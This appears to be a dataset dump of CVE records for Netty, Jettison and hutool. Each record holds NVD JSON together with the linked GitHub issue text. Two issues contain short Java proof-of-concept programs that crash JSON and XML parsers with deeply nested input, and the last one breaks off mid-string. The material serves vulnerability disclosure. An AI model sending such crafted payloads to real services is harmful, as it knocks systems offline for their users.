❯ mvn -Dtest=DefaultHttpHeaders* test -f codec-http/pom.xml
...
[INFO] Tests run: 22, Failures: 0, Errors: 0, Skipped: 0
[INFO] BUILD SUCCESS
# Applying the patch:
❯ curl -sL https://github.com/netty/netty/files/10311197/netty-cve-2022-41915-test.patch | git apply -
❯ git status -s
M codec-http/src/test/java/io/netty/handler/codec/http/DefaultHttpHeadersTest.java
❯ mvn -Dtest=DefaultHttpHeaders* test -f codec-http/pom.xml
# ...
[INFO] Tests run: 24, Failures: 0, Errors: 0, Skipped: 0
[INFO] BUILD SUCCESS
```
Also confirmed 4.1.79 is not affected.
EDIT: uploaded correct patch
| CVE CVE-2022-41915: Incorrect range. Releases < 4.1.83.Final not affected | https://api.github.com/repos/netty/netty/issues/13084/comments | 1 | 2022-12-27T23:46:52Z | 2023-02-13T09:08:35Z | https://github.com/netty/netty/issues/13084 | 1,512,263,101 | 13,084 | 4,492 |
CVE-2022-45685 | 2022-12-13T15:15:11.210 | A stack overflow in Jettison before v1.5.2 allows attackers to cause a Denial of Service (DoS) via crafted JSON data. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jettison-json/jettison/issues/54"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5312"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jettison-json/jettison/issues/54"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5312"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jettison_project:jettison:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A52261E1-B166-486D-90BA-E49155176361",
"versionEndExcluding": "1.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/jettison-json/jettison/issues/54 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jettison-json",
"jettison"
] | reproduced case as follow:
```
public class poc {
public static void main(String[] args) throws JSONException {
String s="{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{";
new JSONObject(s);
}
}
```
the result as follow:
<img width="1159" alt="image" src="https://user-images.githubusercontent.com/32029400/202459744-c82d61ff-2edb-4de8-b4d1-ad06cd084c89.png">
| Find a StackOverflowError in jettison | https://api.github.com/repos/jettison-json/jettison/issues/54/comments | 2 | 2022-11-17T13:32:27Z | 2023-06-15T15:20:09Z | https://github.com/jettison-json/jettison/issues/54 | 1,453,358,053 | 54 | 4,493 |
CVE-2022-45688 | 2022-12-13T15:15:11.267 | A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2748"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stleary/JSON-java/issues/708"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2748"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stleary/JSON-java/issues/708"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:5.8.10:*:*:*:*:*:*:*",
"matchCriteriaId": "B9093201-DAC8-4158-83DA-F0DC735A7F16",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json-java_project:json-java:*:*:*:*:*:*:*:*",
"matchCriteriaId": "201C4D64-D9BD-42F2-862D-E1694D3F0AE8",
"versionEndExcluding": "20230227",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/dromara/hutool/issues/2748 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"dromara",
"hutool"
] | ### 版本情况
JDK版本: openjdk_8_201
hutool版本: 5.8.10(请确保最新尝试是否还有问题)
### 问题描述(包括截图)
1. 复现代码
```
public static void main(String[] args) throws IOException {
String s="<a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a>